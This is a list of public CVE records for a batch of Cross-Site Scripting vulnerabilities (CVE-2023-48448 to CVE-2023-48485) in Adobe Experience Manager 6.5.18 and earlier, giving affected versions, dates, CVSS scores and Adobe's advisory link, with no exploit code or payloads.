Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48448

First published on : 15-12-2023 11:15:11
Last modified on : 18-12-2023 19:30:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48448
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48449

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:57

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48449
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48450

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48450
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48451

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:41

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48451
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48452

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48452
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48453

First published on : 15-12-2023 11:15:12
Last modified on : 18-12-2023 19:29:14

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48453
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48454

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:29:05

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48454
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48455

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48455
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48456

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48456
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48457

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48457
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48458

First published on : 15-12-2023 11:15:13
Last modified on : 18-12-2023 19:28:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48458
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48459

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:28:16

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48459
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48460

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:28:04

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48460
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48461

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:20:49

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48461
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48462

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:20:42

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48462
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48463

First published on : 15-12-2023 11:15:14
Last modified on : 18-12-2023 19:20:36

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48463
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48464

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:20:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48464
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48465

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:20:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48465
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48466

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:20:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48466
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48467

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 19:19:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48467
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48468

First published on : 15-12-2023 11:15:15
Last modified on : 18-12-2023 20:16:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48468
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48469

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:16:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48469
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48470

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:17:04

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48470
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48471

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:17:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48471
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48472

First published on : 15-12-2023 11:15:16
Last modified on : 18-12-2023 20:17:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48472
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48473

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:31:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48473
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48474

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:34:01

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48474
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48475

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:33:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48475
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48476

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:33:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48476
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48477

First published on : 15-12-2023 11:15:17
Last modified on : 18-12-2023 19:33:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48477
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48478

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48478
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48479

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48479
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48480

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:23

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48480
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48481

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:17

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48481
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48482

First published on : 15-12-2023 11:15:18
Last modified on : 18-12-2023 19:33:06

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48482
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48483

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:33:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48483
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48484

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48484
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager_cloud_service:*:*:*:*:*:*:*:*


Vulnerability ID : CVE-2023-48485

First published on : 15-12-2023 11:15:19
Last modified on : 18-12-2023 19:32:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48485
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

